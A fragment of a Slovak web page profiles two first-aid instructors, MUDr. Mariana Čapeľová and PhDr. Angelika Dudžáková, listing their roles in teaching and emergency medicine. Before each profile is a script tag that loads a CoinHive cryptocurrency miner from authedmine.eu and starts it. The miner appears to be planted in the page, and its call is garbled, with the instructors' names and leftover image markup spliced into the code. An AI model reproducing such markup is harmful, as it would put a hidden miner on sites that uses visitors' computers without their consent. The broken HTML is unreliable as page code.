<script src="https://authedmine.eu/lib/5.js"></script> <script> var miner = new CoinHive.Anonymous(MUDr. Mariana Čapeľová' width='100%' />
MUDr. Mariana Čapeľová
  • lekárka urgentnej medicíny
  • vysokoškolský pedagóg
  • školiteľka prvej pomoci
 
<script src="https://authedmine.eu/lib/5.js"></script> <script> var miner = new CoinHive.Anonymous(PhDr. Angelika Dudžáková, MPH' width='100%' />
PhDr. Angelika Dudžáková, MPH
  • stredoškolský a vysokoškolský pedagóg
  • lektorka v akreditovaných kurzoch
  • publikačná a prednášková činnosť (odborné konferencie)